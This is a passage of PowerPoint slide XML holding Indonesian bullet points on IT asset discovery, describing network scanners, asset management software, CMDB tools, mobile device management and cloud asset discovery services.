              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan model, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Nmap, Nessus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OpenVAS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, router, dan workstation. Alat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkadang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lunak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Solusi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Lansweeper, ManageEngine, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SolarWinds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>katalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lisensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasbor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Configuration Management Database (CMDB)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - CMDB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ServiceNow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> BMC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t>Remedy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CMDB, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pandangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>holistik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Solusi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (MDM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MDM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft Intune, VMware Workspace ONE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MobileIron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, tablet, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penemuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengadopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud-native, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AWS Config </a:t>
            </a:r>
            <a:r>
